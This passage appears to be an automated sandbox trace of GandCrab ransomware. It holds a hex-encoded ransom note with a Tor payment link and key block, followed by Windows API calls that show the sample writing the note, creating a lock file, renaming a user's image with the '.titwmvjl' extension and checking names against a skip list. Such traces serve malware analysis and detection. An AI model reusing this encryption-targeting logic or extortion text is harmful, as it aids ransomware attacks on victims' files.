x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0088.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0088.473] CloseHandle (hObject=0x2b4) returned 1 [0088.473] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.474] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.474] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x21, wMilliseconds=0x317)) [0088.474] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.474] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0088.474] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0088.474] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\d2ca4a09d2ca4deb61a.lock") returned 78 [0088.474] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0088.474] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.475] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\") returned 54 [0088.475] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\*" [0088.475] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503378 [0088.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.475] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.475] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.475] lstrcmpW (lpString1="7Vis L VfHrcV53y.png", lpString2=".") returned 1 [0088.475] lstrcmpW (lpString1="7Vis L VfHrcV53y.png", lpString2="..") returned 1 [0088.475] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="7Vis L VfHrcV53y.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png" [0088.475] lstrlenW (lpString=".titwmvjl") returned 9 [0088.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png") returned 74 [0088.475] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.476] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png.titwmvjl") returned 83 [0088.476] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png") returned 74 [0088.476] lstrlenW (lpString=".png") returned 4 [0088.476] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.476] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0088.476] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0088.476] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.476] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png") returned 74 [0088.476] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\7Vis L VfHrcV53y.png") returned 74 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="desktop.ini") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="autorun.inf") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="ntuser.dat") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="iconcache.db") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="bootsect.bak") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="boot.ini") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="ntuser.dat.log") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="thumbs.db") returned -1 [0088.476] lstrcmpiW (lpString1="7Vis L VfHrcV53y.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.476] 